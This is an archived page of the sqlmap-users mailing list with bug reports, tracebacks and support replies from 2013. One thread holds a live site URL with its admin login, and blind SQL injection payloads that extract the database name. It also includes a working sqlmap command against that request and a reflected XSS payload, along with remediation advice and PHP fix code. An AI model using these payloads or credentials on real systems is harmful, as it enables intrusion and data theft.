sqlmap-users Mailing List for sqlmap (Page 36)
From: Brandon P. <bpe...@gm...> - 2013-05-23 21:09:30
Tested and works like a charm. Thanks, you guys rock.

On Thu, May 23, 2013 at 9:21 AM, Brandon Perry <bpe...@gm...> wrote:

> Can test this evening! Thanks
>
> On Thu, May 23, 2013 at 3:30 AM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Hi Brandon.
>>
>> Please retry it now :-)
>>
>> Kind regards,
>> Miroslav Stampar
>> On May 23, 2013 5:57 AM, "Brandon Perry" <bpe...@gm...> wrote:
>>
>>> I am trying to pass in the following for a header:
>>>
>>> SOAPAction:http://tempuri.org/AddUser
>>>
>>> I think the second colon is fudging things up but it is required for the
>>> header and request to function properly. Is there a way for me to "escape"
>>> the colon?
>>>
>>> The error I get is:
>>>
>>> invalid header value: 'SOAPAction:http://tempuri.org/AddUser'. Valid
>>> header format is 'name:value'
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

From: Brandon P. <bpe...@gm...> - 2013-05-23 14:21:53
Can test this evening! Thanks

On Thu, May 23, 2013 at 3:30 AM, Miroslav Stampar <mir...@gm...> wrote:

> Hi Brandon.
>
> Please retry it now :-)
>
> Kind regards,
> Miroslav Stampar
> On May 23, 2013 5:57 AM, "Brandon Perry" <bpe...@gm...> wrote:
>
>> I am trying to pass in the following for a header:
>>
>> SOAPAction:http://tempuri.org/AddUser
>>
>> I think the second colon is fudging things up but it is required for the
>> header and request to function properly. Is there a way for me to "escape"
>> the colon?
>>
>> The error I get is:
>>
>> invalid header value: 'SOAPAction:http://tempuri.org/AddUser'. Valid
>> header format is 'name:value'
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

From: Chris O. <chr...@gm...> - 2013-05-23 09:53:17
Hi Guy

This is indeed a valid vulnerability. If we take the following request:

POST /trk/lpg/index.php HTTP/1.1
Host: myimg.co
Cookie: PHPSESSID=yourID

from_date=2013-05-21&to_date=2013-05-23&campaign_id=11'5*CA-PTV*Keyword*********&crap=&submit=submit&stage=2

Then we receive a response which includes the following:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'5 AND clicks.ViewDate > '2013-05-21' AND clicks.View' at line 10

Notice the apostrophe included in the campaign_id. This breaks the SQL syntax and proves that we have error based SQL injection. You should not output DBMS error messages to the client, although simply disabling this will not remove the issue, because there are other, blind, techniques that we can use (e.g. time based etc.)

The above does prove the concept, the issue is there. In terms of making it work with SQLMap, the following should work:

1) Save the entire HTTP request into a file, for the purposes of this demonstration I've saved it to a file called REQUEST in the same directory as SQLMap.
2) Edit the file so that campaign_id is just an integer, e.g. 115
3) Use the following command:

python sqlmap.py -r REQUEST -p campaign_id --suffix "*CA-PTV*Keyword**********" -f -b

You can replace the -f and -b with whatever it is you're trying to get at, e.g. --dbs to list the databases available to that DBMS user.

The problem you were having probably arose from the fact that the injection point is mid value, so you needed to provide the rest of the expected value to create "valid" requests.

To fix this issue, you need to be using prepared statements, so for PHP see, for example: http://php.net/manual/en/pdo.prepare.php

Finally, as an aside, you also have (reflected) Cross Site Scripting issues. If you insert script tags into the three primary POST values (i.e. from_date, to_date and campaign_id) the page response doesn't encode the output and so you can have a request such as:

from_date=2013-05-21<script>alert(123)</script>&to_date...

and the page will respond with:

<b>Date Range: </b> 2013-05-21<script>alert(123)</script> --- 2013-05-23<br>....etc.

Bearing all of the above in mind, your remediation priority should be:

1) Use prepared statements for all SQL queries in order to get rid of SQL injection
2) Output encode all content returned to the client in a manner appropriate for the context of that output (e.g. encoding for output that will end up as normal HTML will differ from encoding output that appears in an existing JS block). This will get rid of most XSS.
3) Stop outputting DBMS error messages to the client. It's fine to save these to a file above the web root.

Well, that's my gratis work done for the year :) Hope it helped.

Regards
Chris Oakley

On 23 May 2013 00:53, Guy Dufour <yam...@gm...> wrote:

> My script is installed on http://myimg.co/trk/lpg/
> login " admin ", password " hello "
>
> A security advisor told me that it's injectable while being logged in
> manually by modifying the POST param "campaign_id"
>
> Example:
> Change " 129*US-LP-PPV*PPV********* " to :
>
> 129 and ascii(substring((SELECT database()),1,1))>108*p*ts'*********
> 109
>
> 129 and ascii(substring((SELECT database()),2,1))>120*p*ts'*********
> 121
>
> 129 and ascii(substring((SELECT database()),3,1))>104*p*ts'*********
> 105
>
> 129 and ascii(substring((SELECT database()),4,1))>108*p*ts'*********
> 109
>
> 129 and ascii(substring((SELECT database()),5,1))>102*p*ts'*********
> 103
>
> 129 and ascii(substring((SELECT database()),6,1))>98*p*ts'*********
> 99
>
> 129 and ascii(substring((SELECT database()),7,1))>110*p*ts'*********
> 111
>
> 129 and ascii(substring((SELECT database()),8,1))>94*p*ts'*********
> 95
>
> 129 and ascii(substring((SELECT database()),9,1))>98*p*ts'*********
> 99
>
> 129 and ascii(substring((SELECT database()),10,1))>111*p*ts'*********
> 112
>
> 129 and ascii(substring((SELECT database()),11,1))>117*p*ts'*********
> 118
>
> This gives database name = myimgco_cpv
>
> However I can't seem to be able to make this work in SQLmap..
>
> Do you guys have any idea? You can try to reproduce this on my server,
> without breaking anything please :)
>
> Thanks a lot!

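The three remediation steps listed in the reply above, as an added PHP example that is not part of the original post or of the application's code. The `clicks` table and `ViewDate` column come from the quoted error message; the `CampaignID` column, the helper names, the `id*label*...` reading of `campaign_id`, the upper date bound and the in-memory SQLite stand-in for MySQL are assumptions.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the reporting database: SQLite in memory instead of MySQL.
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false.
function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE clicks (CampaignID INTEGER, ViewDate TEXT)');
    $db->exec("INSERT INTO clicks VALUES (115, '2013-05-22'), (115, '2013-05-23'), (129, '2013-05-22')");
    return $db;
}

// BEFORE (assumed shape of the flaw): the id in front of the first '*' is escaped and
// concatenated into a numeric context. Quote escaping does nothing there, because the
// value is not inside quotes in the SQL text.
function build_query_vulnerable(string $campaignField, string $from): string
{
    $id = addslashes(explode('*', $campaignField)[0]);
    return "SELECT COUNT(*) FROM clicks WHERE CampaignID = $id AND clicks.ViewDate > '$from'";
}

// AFTER, step 1: validate the shape of each field, then bind it as a parameter.
function parse_campaign_id(string $campaignField): int
{
    $id = explode('*', $campaignField, 2)[0];
    if (preg_match('/\A[0-9]{1,9}\z/', $id) !== 1) {
        throw new InvalidArgumentException('campaign_id must start with a numeric id');
    }
    return (int) $id;
}

function parse_date(string $value): string
{
    $d = DateTimeImmutable::createFromFormat('!Y-m-d', $value);
    if ($d === false || $d->format('Y-m-d') !== $value) {
        throw new InvalidArgumentException('dates must be YYYY-MM-DD');
    }
    return $value;
}

function count_clicks(PDO $db, int $campaignId, string $from, string $to): int
{
    $stmt = $db->prepare(
        'SELECT COUNT(*) FROM clicks
          WHERE CampaignID = :id AND ViewDate > :from AND ViewDate <= :to'
    );
    $stmt->bindValue(':id', $campaignId, PDO::PARAM_INT);
    $stmt->bindValue(':from', $from, PDO::PARAM_STR);
    $stmt->bindValue(':to', $to, PDO::PARAM_STR);
    $stmt->execute();
    return (int) $stmt->fetchColumn();
}

// Step 2: encode for the HTML body context at the point of output.
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_report(PDO $db, array $post): string
{
    $field = static function (string $name) use ($post): string {
        $v = $post[$name] ?? '';
        return is_string($v) ? $v : '';   // array-valued parameters are treated as empty
    };
    try {
        $from = parse_date($field('from_date'));
        $to   = parse_date($field('to_date'));
        $n    = count_clicks($db, parse_campaign_id($field('campaign_id')), $from, $to);
    } catch (InvalidArgumentException $ex) {
        return '<b>Invalid request: </b>' . html($ex->getMessage());
    } catch (PDOException $ex) {
        // Step 3: DBMS errors go to the server log, never into the response.
        error_log('report query failed: ' . $ex->getMessage());
        return '<b>Report unavailable.</b>';
    }
    return '<b>Date Range: </b> ' . html($from) . ' --- ' . html($to) . '<br>Clicks: ' . $n;
}

// Constructed requests: a normal one, and one carrying the apostrophe value from the post above.
$db  = make_db();
$ok  = ['from_date' => '2013-05-21', 'to_date' => '2013-05-23',
        'campaign_id' => '115*CA-PTV*Keyword*********'];
$bad = ['campaign_id' => "11'5*CA-PTV*Keyword*********"] + $ok;

echo build_query_vulnerable($bad['campaign_id'], $bad['from_date']), "\n";
echo render_report($db, $ok), "\n";
echo render_report($db, $bad), "\n";
```

Run it with the PHP command-line interpreter; it needs the pdo_sqlite extension and no network access.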
From: Miroslav S. <mir...@gm...> - 2013-05-23 07:33:32
Hi again.

I would really need to know the format of those urls inside to handle this problem appropriately.

Kind regards,
Miroslav Stampar

On May 22, 2013 6:12 PM, "Miroslav Stampar" <mir...@gm...> wrote:

> Hi.
>
> Can you please send the content of that list file?
>
> Kind regards,
> Miroslav Stampar
> On 22.5.2013. 16:07, "e.n...@st..." <e.n...@st...> wrote:
>
>> Hi guys,
>>
>> I have pasted this exception so that you can have a look if it is
>> possible to fix it:
>>
>> [13:30:37] [CRITICAL] unhandled exception in sqlmap/1.0-dev-2bfdac5,
>> retry your run with the latest development version from the GitHub
>> repository. If the exception persists, please send by e-mail to
>> 'sql...@li...' or open a new issue at
>> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>> text and any information required to reproduce the bug. The developers
>> will try to reproduce the bug, fix it accordingly and get back to you.
>> sqlmap version: 1.0-dev-2bfdac5
>> Python version: 2.7.3
>> Operating system: posix
>> Command line: sqlmap.py -m list2try.txt --check-tor --tor --tor-type=SOCKS5 --random-agent --threads 5 --beep --batch --dbs
>> Technique: None
>> Back-end DBMS: None (identified)
>> Traceback (most recent call last):
>>   File "sqlmap.py", line 89, in main
>>     start()
>>   File "/home/sqlmap/sqlmap/lib/controller/controller.py", line 274, in start
>>     parseTargetUrl()
>>   File "/home/sqlmap/sqlmap/lib/core/common.py", line 1162, in parseTargetUrl
>>     if CUSTOM_INJECTION_MARK_CHAR in conf.url:
>>   File "/usr/lib/python2.7/urlparse.py", line 183, in urlsplit
>>     raise ValueError("Invalid IPv6 URL")
>> ValueError: Invalid IPv6 URL
>>
>> [*] shutting down at 13:30:37
>>
>> Cheers,
>> Eduardo

From: Miroslav S. <mir...@gm...> - 2013-05-23 07:30:45
Hi Brandon.

Please retry it now :-)

Kind regards,
Miroslav Stampar

On May 23, 2013 5:57 AM, "Brandon Perry" <bpe...@gm...> wrote:

> I am trying to pass in the following for a header:
>
> SOAPAction:http://tempuri.org/AddUser
>
> I think the second colon is fudging things up but it is required for the
> header and request to function properly. Is there a way for me to "escape"
> the colon?
>
> The error I get is:
>
> invalid header value: 'SOAPAction:http://tempuri.org/AddUser'. Valid
> header format is 'name:value'
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website

From: Brandon P. <bpe...@gm...> - 2013-05-23 03:56:59
I am trying to pass in the following for a header:

SOAPAction:http://tempuri.org/AddUser

I think the second colon is fudging things up but it is required for the header and request to function properly. Is there a way for me to "escape" the colon?

The error I get is:

invalid header value: 'SOAPAction:http://tempuri.org/AddUser'. Valid header format is 'name:value'

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

From: Guy D. <yam...@gm...> - 2013-05-22 23:53:49
My script is installed on http://myimg.co/trk/lpg/
login " admin ", password " hello "

A security advisor told me that it's injectable while being logged in manually by modifying the POST param "campaign_id"

Example:
Change " 129*US-LP-PPV*PPV********* " to :

129 and ascii(substring((SELECT database()),1,1))>108*p*ts'*********
109

129 and ascii(substring((SELECT database()),2,1))>120*p*ts'*********
121

129 and ascii(substring((SELECT database()),3,1))>104*p*ts'*********
105

129 and ascii(substring((SELECT database()),4,1))>108*p*ts'*********
109

129 and ascii(substring((SELECT database()),5,1))>102*p*ts'*********
103

129 and ascii(substring((SELECT database()),6,1))>98*p*ts'*********
99

129 and ascii(substring((SELECT database()),7,1))>110*p*ts'*********
111

129 and ascii(substring((SELECT database()),8,1))>94*p*ts'*********
95

129 and ascii(substring((SELECT database()),9,1))>98*p*ts'*********
99

129 and ascii(substring((SELECT database()),10,1))>111*p*ts'*********
112

129 and ascii(substring((SELECT database()),11,1))>117*p*ts'*********
118

This gives database name = myimgco_cpv

However I can't seem to be able to make this work in SQLmap..

Do you guys have any idea? You can try to reproduce this on my server, without breaking anything please :)

Thanks a lot!

From: Miroslav S. <mir...@gm...> - 2013-05-22 19:32:49
Hi.

Thank you for your report. It should be (hopefully) fixed now.

Kind regards,
Miroslav Stampar

On May 22, 2013 12:48 PM, "kvasilopoulos" <kyp...@at...> wrote:

> [02:43:03] [CRITICAL] unhandled exception in sqlmap/1.0-dev-4b2cf07, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to
> 'sql...@li...' or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-4b2cf07
> Python version: 2.7.1
> Operating system: posix
> Command line: ./sqlmap.py -u ******************************************* --data="data_replaced" -v 2 --search pass -D ***************************************** -p vulnerable_parameter --level 5 --risk 3 --dbms mssql
> Technique: ERROR
> Back-end DBMS: Microsoft SQL Server (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 89, in main
>     start()
>   File "/Users/xxx/sqlmap-dev1/lib/controller/controller.py", line 576, in start
>     action()
>   File "/Users/xxx/sqlmap-dev1/lib/controller/action.py", line 133, in action
>     conf.dbmsHandler.search()
>   File "/Users/xxx/sqlmap-dev1/plugins/generic/search.py", line 598, in search
>     self.searchDb()
>   File "/Users/xxx/sqlmap-dev1/plugins/generic/search.py", line 88, in searchDb
>     query = query % (dbQuery + exclDbsQuery)
> TypeError: not all arguments converted during string formatting
>
> Regards
> Kyprianos Vasilopoulos

From: Miroslav S. <mir...@gm...> - 2013-05-22 16:12:19
Hi.

Can you please send the content of that list file?

Kind regards,
Miroslav Stampar

On 22.5.2013. 16:07, "e.n...@st..." <e.n...@st...> wrote:

> Hi guys,
>
> I have pasted this exception so that you can have a look if it is
> possible to fix it:
>
> [13:30:37] [CRITICAL] unhandled exception in sqlmap/1.0-dev-2bfdac5,
> retry your run with the latest development version from the GitHub
> repository. If the exception persists, please send by e-mail to
> 'sql...@li...' or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers
> will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-2bfdac5
> Python version: 2.7.3
> Operating system: posix
> Command line: sqlmap.py -m list2try.txt --check-tor --tor --tor-type=SOCKS5 --random-agent --threads 5 --beep --batch --dbs
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "sqlmap.py", line 89, in main
>     start()
>   File "/home/sqlmap/sqlmap/lib/controller/controller.py", line 274, in start
>     parseTargetUrl()
>   File "/home/sqlmap/sqlmap/lib/core/common.py", line 1162, in parseTargetUrl
>     if CUSTOM_INJECTION_MARK_CHAR in conf.url:
>   File "/usr/lib/python2.7/urlparse.py", line 183, in urlsplit
>     raise ValueError("Invalid IPv6 URL")
> ValueError: Invalid IPv6 URL
>
> [*] shutting down at 13:30:37
>
> Cheers,
> Eduardo

From: <e.n...@st...> - 2013-05-22 12:06:07
Hi guys,

I have pasted this exception so that you can have a look if it is possible to fix it:

[13:30:37] [CRITICAL] unhandled exception in sqlmap/1.0-dev-2bfdac5, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-2bfdac5
Python version: 2.7.3
Operating system: posix
Command line: sqlmap.py -m list2try.txt --check-tor --tor --tor-type=SOCKS5 --random-agent --threads 5 --beep --batch --dbs
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "sqlmap.py", line 89, in main
    start()
  File "/home/sqlmap/sqlmap/lib/controller/controller.py", line 274, in start
    parseTargetUrl()
  File "/home/sqlmap/sqlmap/lib/core/common.py", line 1162, in parseTargetUrl
    if CUSTOM_INJECTION_MARK_CHAR in conf.url:
  File "/usr/lib/python2.7/urlparse.py", line 183, in urlsplit
    raise ValueError("Invalid IPv6 URL")
ValueError: Invalid IPv6 URL

[*] shutting down at 13:30:37

Cheers,
Eduardo

From: kvasilopoulos <kyp...@at...> - 2013-05-22 10:47:45
[02:43:03] [CRITICAL] unhandled exception in sqlmap/1.0-dev-4b2cf07, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-4b2cf07
Python version: 2.7.1
Operating system: posix
Command line: ./sqlmap.py -u ******************************************* --data="data_replaced" -v 2 --search pass -D ***************************************** -p vulnerable_parameter --level 5 --risk 3 --dbms mssql
Technique: ERROR
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 89, in main
    start()
  File "/Users/xxx/sqlmap-dev1/lib/controller/controller.py", line 576, in start
    action()
  File "/Users/xxx/sqlmap-dev1/lib/controller/action.py", line 133, in action
    conf.dbmsHandler.search()
  File "/Users/xxx/sqlmap-dev1/plugins/generic/search.py", line 598, in search
    self.searchDb()
  File "/Users/xxx/sqlmap-dev1/plugins/generic/search.py", line 88, in searchDb
    query = query % (dbQuery + exclDbsQuery)
TypeError: not all arguments converted during string formatting

Regards
Kyprianos Vasilopoulos

From: Miroslav S. <mir...@gm...> - 2013-05-18 12:37:59
Hi Marcell.

There is no such capability (and IMO it would be ugly to put a --banner-md5:), although it makes sense what you are trying to do).

Nevertheless, you can go to xml/queries.xml and change (line 23):

<banner query="VERSION()"/>

to

<banner query="MD5(VERSION())"/>

Kind regards,
Miroslav Stampar

On Sat, May 18, 2013 at 7:36 AM, Marcell Fodor <fod...@gm...> wrote:

> Heya,
>
> Is it possible to get the version as md5 hash? I mean a simple
> md5(@@version). The whole point is not pulling any sensitive data from
> database. The question comes up when database owner only wants confirmation
> of found injection point by md5 hash.
>
> like --banner-md5
>
> M

--
Miroslav Stampar
http://about.me/stamparm

From: Marcell F. <fod...@gm...> - 2013-05-18 05:43:45
Heya,

Is it possible to get the version as md5 hash? I mean a simple md5(@@version). The whole point is not pulling any sensitive data from database. The question comes up when database owner only wants confirmation of found injection point by md5 hash.

like --banner-md5

M

From: Miroslav S. <mir...@gm...> - 2013-05-12 11:43:38
Hi Marcell.

We can't include all those dependencies as it would make sqlmap package even bigger than it's now. Also, direct connection feature is an "optional" one.

There could be (privilege?) complications with a PyMySQL setup. While you are not able to do the following command, you won't be able to properly run "-d" against MySQL:

python -c "import pymysql"

Optionally, you can try to run: python-sqlalchemy and rerun the -d... SQLAlchemy is an optional way how sqlmap handles direct connections.

Kind regards,
Miroslav Stampar

On Sun, May 12, 2013 at 9:53 AM, Marcell Fodor <fod...@gm...> wrote:

> Heya,
>
> I needed direct access to mysql server and got error:
> [03:24:45] [CRITICAL] sqlmap requires 'python pymysql' third-party library
> in order to directly connect to the database MySQL. Download from
> 'https://github.com/petehunt/PyMySQL/'
>
> Now I got "This repository is temporarily unavailable." error and also
> tried to install like in this tutorial copy/pasted from web:
>
> Direct connection to the database
> --------------------------------------------------
>
> Installing Py-MySQL Dependency
>
> git clone https://github.com/petehunt/PyMySQL/
> cd PyMySQL
> python setup.py install
> cd ..
> rm -rf PyMySQL
>
> ./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10
>
> First line fails.
>
> Would be great if this library was included in default install.
>
> Thanks in advance,
>
> Marcell

--
Miroslav Stampar
http://about.me/stamparm

From: Marcell F. <fod...@gm...> - 2013-05-12 07:53:51
Heya,

I needed direct access to mysql server and got error:
[03:24:45] [CRITICAL] sqlmap requires 'python pymysql' third-party library in order to directly connect to the database MySQL. Download from 'https://github.com/petehunt/PyMySQL/'

Now I got "This repository is temporarily unavailable." error and also tried to install like in this tutorial copy/pasted from web:

Direct connection to the database
--------------------------------------------------

Installing Py-MySQL Dependency

git clone https://github.com/petehunt/PyMySQL/
cd PyMySQL
python setup.py install
cd ..
rm -rf PyMySQL

./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10

First line fails.

Would be great if this library was included in default install.

Thanks in advance,

Marcell

From: Miroslav S. <mir...@gm...> - 2013-05-07 11:27:29
Hi.

It should be "patched" now [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/447

On Tue, May 7, 2013 at 9:32 AM, Isai Ofir Juarez Contreras <ing...@gm...> wrote:

> [02:30:15] [CRITICAL] unhandled exception in sqlmap/1.0-dev-427d88b, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to
> 'sql...@li...' or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-427d88b
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u ************************************** --data=action=AnswerForm&id_form=1 -D * --dump-all --threads=10
> Technique: BOOL*AN
> Back-end DBMS: Oracle (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap", line 89, in main
>     start()
>   File "/usr/share/sqlmap/lib/controller/controller.py", line 575, in start
>     action()
>   File "/usr/share/sqlmap/lib/controller/action.py", line 130, in action
>     conf.dbmsHandler.dumpAll()
>   File "/usr/share/sqlmap/plugins/generic/entries.py", line 335, in dumpAll
>     self.dumpTable()
>   File "/usr/share/sqlmap/plugins/generic/entries.py", line 83, in dumpTable
>     self.getTables()
>   File "/usr/share/sqlmap/plugins/generic/databases.py", line 336, in getTables
>     table = unArrayizeValue(inject.getValue(query, union=False, error=False))
>   File "/usr/share/sqlmap/lib/request/inject.py", line 383, in getValue
>     value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump)
>   File "/usr/share/sqlmap/lib/request/inject.py", line 278, in _goInferenceProxy
>     outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
>   File "/usr/share/sqlmap/lib/request/inject.py", line 126, in _goInferenceFields
>     output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field)
>   File "/usr/share/sqlmap/lib/request/inject.py", line 98, in _goInference
>     count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump)
>   File "/usr/share/sqlmap/lib/techniques/blind/inference.py", line 134, in bisection
>     length = min(length, lastChar or length) - firstChar
> TypeError: unsupported operand type(s) for -: 'unicode' and 'int'

--
Miroslav Stampar
http://about.me/stamparm

From: Isai O. J. C. <ing...@gm...> - 2013-05-07 07:32:36

[02:30:15] [CRITICAL] unhandled exception in sqlmap/1.0-dev-427d88b, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.

sqlmap version: 1.0-dev-427d88b
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap -u ************************************** --data=action=AnswerForm&id_form=1 -D * --dump-all --threads=10
Technique: BOOL*AN
Back-end DBMS: Oracle (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap", line 89, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 575, in start
    action()
  File "/usr/share/sqlmap/lib/controller/action.py", line 130, in action
    conf.dbmsHandler.dumpAll()
  File "/usr/share/sqlmap/plugins/generic/entries.py", line 335, in dumpAll
    self.dumpTable()
  File "/usr/share/sqlmap/plugins/generic/entries.py", line 83, in dumpTable
    self.getTables()
  File "/usr/share/sqlmap/plugins/generic/databases.py", line 336, in getTables
    table = unArrayizeValue(inject.getValue(query, union=False, error=False))
  File "/usr/share/sqlmap/lib/request/inject.py", line 383, in getValue
    value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump)
  File "/usr/share/sqlmap/lib/request/inject.py", line 278, in _goInferenceProxy
    outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
  File "/usr/share/sqlmap/lib/request/inject.py", line 126, in _goInferenceFields
    output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field)
  File "/usr/share/sqlmap/lib/request/inject.py", line 98, in _goInference
    count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump)
  File "/usr/share/sqlmap/lib/techniques/blind/inference.py", line 134, in bisection
    length = min(length, lastChar or length) - firstChar
TypeError: unsupported operand type(s) for -: 'unicode' and 'int'

From: Miroslav S. <mir...@gm...> - 2013-04-25 18:13:40

Hi Buawig.

Currently, sqlmap should not stop in testing mode (it's debatable what to do in the enumeration phase - currently we abort the program run in such a case) on any occurrence of a non-200 code.

Could you please be more specific here? Maybe there is a related hidden bug somewhere.

Kind regards,
Miroslav Stampar

On Wed, Apr 24, 2013 at 8:40 PM, buawig <bu...@gm...> wrote:

> Hi,
>
> a custom web application responds to different URL parameter payloads
> with changing HTTP status codes:
>
> example.com/foo.bar?param=payload1
> response: 200
>
> example.com/foo.bar?param=payload2
> response: 403
>
> example.com/foo.bar?param=payload3
> response: 400
>
> example.com/foo.bar?param=payload4
> response: 404
>
> ...
>
> sqlmap seems to tolerate occasional 404 response codes but when
> running with --level=5 sqlmap gives up due to the high amount of 404
> response codes.
>
> Even though this web application behaviour is probably not HTTP
> conform, is there a way to tell sqlmap "keep on going even if the
> server tells you 404 file not found"?
>
> If there is currently no such feature, what do you think about it?
>
> With --ignore-404 I do not mean to imply that sqlmap should not
> evaluate HTTP status codes at all (e.g. when using to differentiate
> between true and false in boolean based sql injections).

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2013-04-25 08:18:17

p.s. typo: Replace -> Replaced
p.p.s. just update to have it up and running

On Thu, Apr 25, 2013 at 10:17 AM, Miroslav Stampar <mir...@gm...> wrote:

> Hi Buawig.
>
> It was probably a problem with comma processing (e.g. some kind of field
> splitting)
>
> Nevertheless, went through PgSQL manuals and spotted no difference in both
> functionality and compatibility.
>
> Replace with the latest commit [1]
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/commit/ff62b0d3eaee311c786cd5b9ad5b1cbf1d28c3a3
>
> On Wed, Apr 24, 2013 at 9:24 PM, buawig <bu...@gm...> wrote:
>
>> Hi,
>>
>> on a recent blind SQLi (PostgreSQL 8.4) I had problems using sqlmap to
>> extract data.
>>
>> After having a deeper look at it I noticed that the DB did like the
>> function substr() (I can not entirely exclude it but I do not think
>> that this problem was introduced by some kind of weird anti sqli
>> filtering).
>> To work around that issue I replaced the substr() function in
>>
>> xml/queries.xml
>>
>> with substring( .. from N for 1) and everything worked fine.
>>
>> I thought you might want to add that possibility as a second option
>> (query2= ?) to automatically detect/workaround that issue?
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2013-04-25 08:17:26

Hi Buawig.

It was probably a problem with comma processing (e.g. some kind of field splitting)

Nevertheless, went through PgSQL manuals and spotted no difference in both functionality and compatibility.

Replace with the latest commit [1]

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/commit/ff62b0d3eaee311c786cd5b9ad5b1cbf1d28c3a3

On Wed, Apr 24, 2013 at 9:24 PM, buawig <bu...@gm...> wrote:

> Hi,
>
> on a recent blind SQLi (PostgreSQL 8.4) I had problems using sqlmap to
> extract data.
>
> After having a deeper look at it I noticed that the DB did like the
> function substr() (I can not entirely exclude it but I do not think
> that this problem was introduced by some kind of weird anti sqli
> filtering).
> To work around that issue I replaced the substr() function in
>
> xml/queries.xml
>
> with substring( .. from N for 1) and everything worked fine.
>
> I thought you might want to add that possibility as a second option
> (query2= ?) to automatically detect/workaround that issue?

--
Miroslav Stampar
http://about.me/stamparm

From: buawig <bu...@gm...> - 2013-04-24 19:28:19

Hi,

on a recent blind SQLi (PostgreSQL 8.4) I had problems using sqlmap to extract data.

After having a deeper look at it I noticed that the DB did like the function substr() (I can not entirely exclude it but I do not think that this problem was introduced by some kind of weird anti sqli filtering).
To work around that issue I replaced the substr() function in

xml/queries.xml

with substring( .. from N for 1) and everything worked fine.

I thought you might want to add that possibility as a second option (query2= ?) to automatically detect/workaround that issue?

From: buawig <bu...@gm...> - 2013-04-24 18:43:55

Hi,

a custom web application responds to different URL parameter payloads with changing HTTP status codes:

example.com/foo.bar?param=payload1
response: 200

example.com/foo.bar?param=payload2
response: 403

example.com/foo.bar?param=payload3
response: 400

example.com/foo.bar?param=payload4
response: 404

...

sqlmap seems to tolerate occasional 404 response codes but when running with --level=5 sqlmap gives up due to the high amount of 404 response codes.

Even though this web application behaviour is probably not HTTP conform, is there a way to tell sqlmap "keep on going even if the server tells you 404 file not found"?

If there is currently no such feature, what do you think about it?

